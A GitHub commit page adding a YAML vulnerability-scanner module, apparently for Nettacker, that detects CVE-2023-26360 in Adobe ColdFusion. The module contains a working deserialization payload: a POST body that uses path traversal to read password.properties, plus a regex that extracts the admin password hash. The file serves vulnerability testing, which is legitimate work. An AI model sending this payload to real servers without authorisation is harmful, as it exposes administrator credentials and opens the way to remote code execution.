Skip to content

Commit 239ef4a

Browse files
committed
Create adobe_coldfusion_cve_2023_26360.yaml
1 parent f1ac617 commit 239ef4a

File tree

1 file changed

+52
-0
lines changed

1 file changed

+52
-0
lines changed
Lines changed: 52 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,52 @@
1+
info:
2+
name: adobe_coldfusion_cve_2023_26360_vuln
3+
author: Jimmy Ly
4+
severity: 9.8
5+
description: CVE-2023-26360 - Unauthenticated deserialization of untrusted data vulnerability in Adobe ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to gain abritrary file read and remote code execution.
6+
reference:
7+
- https://nvd.nist.gov/vuln/detail/CVE-2023-26360
8+
- https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html
9+
- http://packetstormsecurity.com/files/172079/Adobe-ColdFusion-Unauthenticated-Remote-Code-Execution.html
10+
profiles:
11+
- vuln
12+
- vulnerability
13+
- http
14+
- critical_severity
15+
- cve
16+
- adobe
17+
- coldfusion
18+
19+
payloads:
20+
- library: http
21+
steps:
22+
- method: post
23+
timeout: 3
24+
headers:
25+
User-Agent: "{user_agent}"
26+
Content-Type: application/x-www-form-urlencoded
27+
allow_redirects: false
28+
ssl: false
29+
url:
30+
nettacker_fuzzer:
31+
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"
32+
prefix: ""
33+
suffix: ""
34+
interceptors:
35+
data:
36+
paths:
37+
- "cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"
38+
- "CFIDE/wizards/common/utils.cfc"
39+
schema:
40+
- "http"
41+
- "https"
42+
ports:
43+
- 80
44+
- 443
45+
- 8500
46+
data: _variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d
47+
response:
48+
condition_type: and
49+
conditions:
50+
content:
51+
regex: "(?<=password=)[A-F0-9]+"
52+
reverse: false

0 commit comments

Comments
 (0)